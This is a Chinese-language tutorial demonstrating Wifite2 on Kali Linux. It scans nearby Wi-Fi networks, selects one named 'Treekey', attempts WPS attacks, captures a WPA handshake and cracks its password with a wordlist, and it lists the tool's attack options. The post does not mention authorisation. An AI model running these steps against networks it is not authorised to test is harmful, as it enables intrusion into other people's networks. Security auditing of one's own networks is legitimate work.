今天要來體驗的工具是Wifite
,標榜只要簡單的指令,不需繁瑣的步驟或額外的參數就能自動完成掃描、破解wifi密碼,且支援WEP、WPA 和 WPS多種標準。話不多說,直接開始體驗吧
Wifite位於Kali的06-Wireless Attacks
分類,直接執行可以看到使用方式
sudo wifite
結果可以拆成幾個區塊來看,第一塊顯示了工具的基本資訊,包含了版本、作者等等,然後有些過程建議備有的套件如果沒裝也會列出
. .
.´ · . . · `. wifite2 2.5.2
: : : (¯) : : : a wireless auditor by @derv82
`. · ` /¯\ ´ · .´ maintained by kimocoder
` /¯¯¯\ ´ https://github.com/kimocoder/wifite2
[!] Warning: Recommended app bully was not found. install @ https://github.com/aanarchyy/bully
[!] Warning: Recommended app pyrit was not found. install @ https://github.com/JPaulMora/Pyrit/wiki
[!] Warning: Recommended app hashcat was not found. install @ https://hashcat.net/hashcat/
[!] Warning: Recommended app hcxdumptool was not found. install @ https://github.com/ZerBea/hcxdumptool
[!] Warning: Recommended app hcxpcaptool was not found. install @ https://github.com/ZerBea/hcxtools
[!] Warning: Recommended app macchanger was not found. install @ apt-get install macchanger
接下來這塊資訊顯示了介面進入監看模式,所以結束了NetworkManger process
[!] Conflicting processes: avahi-daemon (PID 635), NetworkManager (PID 640), wpa_supplicant (PID 673), avahi-daemon (PID 698)
[!] If you have problems: kill -9 PID or re-run wifite with --kill
[+] Using wlp2s0mon already in monitor mode
然後就會進入掃描階段,可以在中途Ctrl + C
來中斷掃描,然後Wifite會詢問目標是哪個,這邊我輸入的是3,也就是Treekey那台
NUM ESSID CH ENCR POWER WPS? CLIENT
--- ------------------------- --- ----- ----- ---- ------
1 ken-2.4G 1 WPA-P 43db no
2 cheng1230 6 WPA-P 43db no
3 Treekey 13 WPA-P 22db lock 1
4 LIANG 11 WPA-P 22db no
5 chandler 6 WPA-P 22db no
6 ASUS 2.4G 6 WPA-P 17db lock
7 dong4 1 WPA-P 16db yes
8 huangfamily-2.4G 1 WPA-P 16db yes
[+] select target(s) (1-16) separated by commas, dashes or all: 3
接著就是一連串的破解過程,最後會產出.cap
以及cracked.txt
,可以看到有破解出密碼111111
[+] (1/1) Starting attacks against AA:AA:AA:AA:AA:AA (Treekey)
[+] Treekey (50db) WPS Pixie-Dust: [4m56s] Failed: Because access point is Locked
[+] Treekey (54db) WPS NULL PIN: [4m56s] Failed: Because access point is Locked
[+] Treekey (44db) WPS PIN Attack: [5s] Failed: Because access point is Locked
[!] Skipping PMKID attack, missing required tools: hcxdumptool, hcxpcaptool
[+] Treekey (47db) WPA Handshake capture: Discovered new client: AA:AA:AA:AA:AA:AA
[+] Treekey (45db) WPA Handshake capture: Captured handshake
[+] saving copy of handshake to hs/handshake_Treekey_2021-10-12T21-22-06.cap saved
[+] analysis of captured handshake file:
[+] tshark: .cap file contains a valid handshake for AA:AA:AA:AA:AA:AA
[!] aircrack: .cap file does not contain a valid handshake
[+] Cracking WPA Handshake: Running aircrack-ng with wordlist-probable.txt wordlist
[+] Cracking WPA Handshake: 0.01% ETA: 1m47s @ 1898.7kps (current key: 11111111)
[+] Cracked WPA Handshake PSK: 11111111
[+] Access Point Name: Treekey
[+] Access Point BSSID: AA:AA:AA:AA:AA:AA
[+] Encryption: WPA
[+] Handshake File: hs/handshake_Treekey_2021-10-12T21-22-06.cap
[+] PSK (password): 11111111
[+] saved crack result to cracked.txt (1 total)
[+] Finished attacking 1 target(s), exiting
以上是最簡易的Wifite
最簡易的用法,其他用法可以參考wifite -h
,像是針對特定模式
WEP:
--wep Show only WEP-encrypted networks
--require-fakeauth Fails attacks if fake-auth fails (default: off)
--keep-ivs Retain .IVS files and reuse when cracking (default: off)
WPA:
--wpa Show only WPA-encrypted networks (includes WPS)
--new-hs Captures new handshakes, ignores existing handshakes in hs (default:
off)
--dict [file] File containing passwords for cracking (default: /usr/share/dict/wordlist-
probable.txt)
WPS:
--wps Show only WPS-enabled networks
--wps-only Only use WPS PIN & Pixie-Dust attacks (default:
off)
--bully Use bully program for WPS PIN & Pixie-Dust attacks (default:
reaver)
--reaver Use reaver program for WPS PIN & Pixie-Dust attacks (default:
reaver)
--ignore-locks Do not stop WPS PIN attack if AP becomes locked (default:
stop)